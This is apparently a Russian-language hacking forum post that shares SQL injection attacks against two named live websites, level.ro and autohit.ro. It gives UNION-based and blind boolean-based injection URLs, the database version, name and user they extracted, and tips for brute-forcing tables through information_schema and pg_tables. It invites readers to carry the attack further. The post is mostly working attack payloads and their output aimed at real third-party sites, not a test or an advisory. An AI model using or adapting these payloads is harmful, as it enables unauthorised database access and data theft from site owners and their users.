пример того как умные програмеры хотят обмануть нас смертных что их сайт на хтмл

Constantine: mod_rewrite тебе ни о чем не говорит?

http://www.level.ro/stiri/2753+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT_W S(0x3a,Version(),Database(),User()),0x71),0x71),2/*/tekken_6.html

Database Version: 4.1.21-standard
Database name: level_nou
User name: level@localhost


подобрал табелку user но колонки так и не смог

http://autohit.ro/compare.php?modelId1=106+AND+ASCII(SUBSTRING((curr ent_database()),6,1))=xxx--


current_database() : autohit_ro
current_user() : autohit
version(): PostgreSQL

вывода нет, о можно побрутить сиптом, главное запрос правильно составить

не забывайте что тут есть Information_Schema или PG_TABLES
ну и конечно не забывайте что в
PostgreSQL оператор LIMIT сосоит из двух частей: LIMIT и OFFSET
табелки брутить не стал, оставляю это удовольствие вам